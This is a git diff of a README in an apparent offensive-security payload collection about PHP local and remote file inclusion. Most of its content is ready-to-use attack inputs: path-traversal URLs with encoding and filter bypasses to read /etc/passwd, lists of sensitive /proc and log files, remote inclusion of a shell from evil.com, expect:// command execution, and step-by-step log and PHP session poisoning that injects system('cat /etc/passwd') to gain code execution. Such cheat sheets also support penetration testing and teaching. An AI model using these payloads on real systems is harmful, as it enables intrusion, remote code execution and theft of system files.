diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md
index 92d94b8..630d1eb 100644
--- a/File Inclusion - Path Traversal/README.md	
+++ b/File Inclusion - Path Traversal/README.md	
@@ -1,15 +1,6 @@
 # Local/Remote File Inclusion
 The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
 
-## Basic LFI (null byte, double encoding and other tricks)
-```
-http://example.com/index.php?page=etc/passwd
-http://example.com/index.php?page=etc/passwd%00
-http://example.com/index.php?page=../../etc/passwd
-http://example.com/index.php?page=%252e%252e%252f
-http://example.com/index.php?page=....//....//etc/passwd
-```
-
 Interesting files to check out :
 ```
 /etc/issue
@@ -23,6 +14,40 @@ Interesting files to check out :
 /proc/self/environ
 /proc/version
 /proc/cmdline
+/proc/sched_debug
+/proc/mounts
+/proc/net/arp
+/proc/net/route
+/proc/net/tcp
+/proc/net/udp
+/var/log/apache/access.log
+/var/log/apache/error.log
+/var/log/httpd/error_log
+/usr/local/apache/log/error_log
+/usr/local/apache2/log/error_log
+/var/log/vsftpd.log
+/var/log/sshd.log
+/var/log/mail
+```
+
+## Basic LFI
+```
+http://example.com/index.php?page=../../../etc/passwd
+
+Null byte
+http://example.com/index.php?page=../../../etc/passwd%00
+
+Double encoding
+http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
+http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
+
+Path truncation
+http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
+http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
+
+Filter bypass
+http://example.com/index.php?page=....//....//etc/passwd
+http://example.com/index.php?page=..///////..////..//////etc/passwd
 ```
 
 ## Basic RFI (null byte, double encoding and other tricks)
@@ -32,8 +57,6 @@ http://example.com/index.php?page=http://evil.com/shell.txt%00
 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
 ```
 
-
-
 ## LFI / RFI Wrappers
 
 LFI Wrapper rot13 and base64 - php://filter case insensitive
@@ -69,7 +92,7 @@ http://example.com/index.php?page=php:expect://id
 http://example.com/index.php?page=php:expect://ls
 ```
 
-## Bonus XSS
+Bonus XSS    
 XSS via RFI/LFI with "<svg onload=alert(1)>" payload
 ```
 http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
@@ -79,6 +102,7 @@ http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbm
 1. Upload a lot of shells (for example : 100)
 2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD
 with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
+/proc/self/environ can also be used
 
 
 ## LFI to RCE via Upload
@@ -92,8 +116,70 @@ https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assist
 Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
 
 
+## LFI to RCE via input:// stream
+TODO
+file=php://input
+(specify your payload in the POST parameters,
+
+
+
+## LFI to RCE via controlled log file
+Just append your PHP code into the log file and include it.
+```
+http://example.com/index.php?page=/var/log/apache/access.log
+http://example.com/index.php?page=/var/log/apache/error.log
+http://example.com/index.php?page=/var/log/vsftpd.log
+http://example.com/index.php?page=/var/log/sshd.log
+http://example.com/index.php?page=/var/log/mail
+http://example.com/index.php?page=/var/log/httpd/error_log
+http://example.com/index.php?page=/usr/local/apache/log/error_log
+http://example.com/index.php?page=/usr/local/apache2/log/error_log
+```
+
+## LFI to RCE via PHP Sessions
+Check if the website use PHP Session (PHPSESSID)
+```
+Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
+Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
+```
+In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files
+```
+/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
+user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
+```
+Set the cookie to <?php system('cat /etc/passwd');?>
+```
+login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
+```
+Use the LFI to include the PHP session file
+```
+login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
+```
+
+
+## Checklist - Common ways of upgrading from LFI to RCE
+```
+Using file upload forms/functions
+Using the PHP wrapper expect://command
+Using the PHP wrapper php://file
+Using the PHP wrapper php://filter
+Using PHP input:// stream
+Using data://text/plain;base64,command
+Using /proc/self/environ
+Using /proc/self/fd
+Using PHP Session
+Using log files with controllable input like:
+  /var/log/apache/access.log
+  /var/log/apache/error.log
+  /var/log/vsftpd.log
+  /var/log/sshd.log
+  /var/log/mail
+```
+
 ## Thanks to
 * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
 * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
 * [Turning LFI to RFI ](https://l.avala.mp/?p=241)
 * [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
+* [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)
+* [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)